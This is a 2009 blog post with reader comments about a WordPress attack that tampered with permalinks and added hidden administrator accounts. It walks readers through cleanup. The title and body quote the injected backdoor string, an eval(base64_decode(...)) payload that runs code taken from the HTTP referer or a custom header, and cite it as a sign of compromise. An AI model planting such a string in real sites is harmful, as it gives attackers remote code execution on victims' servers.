UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

$UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/$

Hello there! If you are new here, you might want to subscribe to the RSS feed for updates on this topic.

Hey Guys,

Just realized that a lot of people were hit with this latest WordPress Blog Attack – Its a MySQL Injection that screws up your permalinks and in turn makes you blog post links not work! So I figured i’d write up this quick post to help some people out!

It appears that yesterday, many wordpress blogs got hit with this nasty hack that appended a
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or a
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

to your permalinks which rendered your blog post links useless unless someone physically removed the infected string of code from the URL

To fix things:

go to Setting->Permalinks and delete the above mean code

go to users, you will notice there are more administrators than usual

Put your mouse over the users and find the one that is last to register

Right click and copy the edit url, then paste it into the address bar. Also increase the number by 1.

You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber then return to users and delete him.
This should fix it. Don’t forget to upgrade your blog to the latest version.

Hope this helps everyone! You can also delete the hidden user from PHPMyAdmin directly from the database, whatever you are comfortable with.

UPDATE: Mashable has written about this issue here.

NEWEST UPDATE: WordPress Responds to Attacks

NEWEST UPDATE: OFFICIAL RESPONSE FROM WORDPRESS

Here are some other good posts on the topic and have other examples that may be more specific to your issue:

http://www.warriorforum.com/main-internet-marketing-discussion-forum/121131-wordpress-mysql-injection-latest-attack-eval-base64_decode-_server-http_referer.html

http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

If you like this, You'll love These.

About the Author

Andy Sowards

Im a professional Freelancer specializing in Web Developer, Design, Programming web applications. Im an Avid member of the Design/Development community and a Serial Blogger. follow me on Twitter @AndySowards

24 Responses to “UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/”

Reed Valladores November 9, 2011

How to insert Dynamic Drive codes and scripts on my Joomla site?

Reply
Gaith September 6, 2009

I just deleted the users, but did not delete the user name with a weird code is that enough? also changed cpanel, db and wp passwords?

Reply
- Andy Sowards September 6, 2009
  
  Gaith, You don’t have to change your DB pw’s but that is also a good measure, however if you need help deleting the wordpress user from the `wp_users` table of the mysql database, this post has a good explanation of how to do that at the bottom of the post http://www.netpassiveincome.com/wordpress-mysql-injection-permalink/
  
  Reply
Ben September 6, 2009

Damn. My wordpress is up to date, there’s no extra junk in my permalinks settings and there’s no additional users. But all my links are stuffed. A;; the symptoms of the current bug. I can’t find any info anywhere other than to make sure it’s the latest version which it is. Don’t tell me I have to do a fresh install. Arrrrrggggh!

Reply
Shawn Plep September 5, 2009

Please be careful before spreading information that isn’t proven; it’s most likely that your system was compromised before your upgrade to 2.8.4. Have you looked at your server logs yet? Do you know when the compromise occurred, how it occurred, and which version of WP you were running at that time? THIS is the info we need before we can state which version of WP has a vulnerability.

Reply
- Andy Sowards September 5, 2009
  
  Shawn thanks for the concern but this is a widespread attack, see this post http://mashable.com/2009/09/05/wordpress-attack/
  
  I confirmed the validity of this post before posting this a whole day before mashable
  
  Reply
Mark Jaquith September 5, 2009

This was fixed in a round-about way by WordPress 2.8.1

WordPress 2.8.4 is not vulnerable. It is, however, possible that you were compromised before upgrading, and they still have a user account or have placed an exploit file on your server to allow for ongoing access. Delete user accounts you don’t recognize, and remove foreign PHP files.

Reply
- Andy Sowards September 5, 2009
  
  Thanks Mark for chiming in with that info, That could have very well been what happened, Although the attackers must have been planning this for some time then, because there are countless blogs that were attacked the past day or so, Thanks for working hard to defend these attacks!
  
  Reply
Andy Sowards September 4, 2009

Yes you are correct, I read that as well, BUT Do not know if its 100% Accurate, if that is the case tho then wordpress will have to release 2.8.5 immediately, within the next week

Reply
Designrfix September 4, 2009

sadly none of these links provide a “fix”… it simply tells you how to scoop up the water flowing in with a tea spoon =/

Reply
- Andy Sowards September 4, 2009
  
  Yes unfortunately right now the only thing you can do is update to latest wordpress, and if that doesn’t provide a permanent fix, WordPress will most definitely release 2.8.5 immediately, I will update this post with the latest information
  
  Reply
  - Designrfix September 4, 2009
    
    hmmm thought i read the vuln. hits 2.8.4 also? (which is the latest) sorry if i’m wrong. can’t go back and check at the moment